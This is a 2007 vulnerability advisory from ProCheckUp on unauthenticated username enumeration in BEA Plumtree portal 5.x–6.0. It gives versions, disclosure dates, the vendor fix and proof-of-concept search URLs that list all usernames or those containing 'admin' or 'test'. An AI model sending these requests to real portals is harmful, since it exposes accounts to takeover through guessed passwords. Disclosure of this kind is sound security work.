PR06-11: BEA Plumtree portal search facility leaks usernames to unauthenticated users
PR06-11: BEA Plumtree portal search facility leaks usernames to unauthenticated
users
Description:
BEA Plumtree portal 6.0 is vulnerable to username leakage through the search
facility.
By performing an advanced search, unauthenticated users can enumerate valid
usernames with a single HTTP request. Wildcards are allowed in searches, which
means that substrings can be used in order to target specific username types
such as admin usernames and test usernames.
Note: this username enumeration weakness _doesn't_ require attackers to perform
dictionary or bruteforce attacks in order to obtain usernames.
Date Found: 12th September 2006
Vendor contacted: 18th May 2007
Vulnerable: BEA Plumtree 5.0.2, 5.0.3, 5.0.4, 6.0.1.218452 and possibly other
versions.
Severity: Medium
Authors: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd
(www.procheckup.com)
ProCheckUp thanks BEA for working with us.
Proof of concept:
The following requests all usernames ('*' wildcard), showing a maximum of 100
usernames per page:
https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
The wildcard '*' character can also be combined in the 'in_tx_fulltext'
parameter with strings.
The following request enumerates usernames that contain the substring 'admin'
within them:
https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
The following request enumerates usernames that contain the substring 'test'
within them:
https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
Consequences:
Valid usernames can be easily enumerated by attackers. This includes usernames
with administrative privileges on Plumtree portal. Considering that Plumtree
portal setups don't enforce password complexity requirements, and many
usernames are usually available, it is highly likely that an attacker can
hijack accounts that use easy-to-guess passwords.
Fix: this has been addressed in AquaLogic Interaction 6.1. MP1. This can also
be addressed by making config changes in ALUI 6.x versions.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://dev2dev.bea.com/pub/advisory/254
http://www.plumtree.com/